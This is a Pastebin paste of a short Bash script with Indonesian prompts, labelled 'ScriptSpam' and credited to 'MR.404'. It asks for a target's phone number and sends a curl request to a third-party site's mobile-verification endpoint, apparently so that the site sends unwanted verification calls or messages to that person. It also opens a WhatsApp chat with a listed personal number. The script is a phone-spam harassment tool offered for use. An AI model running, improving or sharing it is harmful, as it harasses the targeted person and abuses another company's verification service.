
PASTEBIN
paste
LOGIN SIGN UP

Guest User
ScriptSpam
A GUEST
JAN 5TH, 2021
57
NEVER
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
0.75 KB
  
#!bin/bash
clear
echo "****************************"
 
echo "____________________________"
echo "PEMBUAT RAIHAN/MR.404"
echo "____________________________"
echo "****************************"
figlet Telp | lolcat
echo "::::::::::::::::::::::::::::::"
echo '
[1], telepon spam
[2], keluar &kontak admin
'
echo "::::::::::::::::::::::::::::::"
echo
read -p "masukan pilihan kalian lurd : " pil
if [[ $pil == 1 ]]; then
read -p "Masukan No Target contoh:89528100123  : " nomor
link="https://id.jagreward.com/member/verify-mobile/$nomor"
curl -s $link
else
echo "thanks ya lurd udah pakai tools MR.404"
echo "chat admin dulu"
xdg-open 'https://wa.me/6282331072836/?text=Assalamualaikum+Apa+kabar+MR.404'
exit
fi
echo
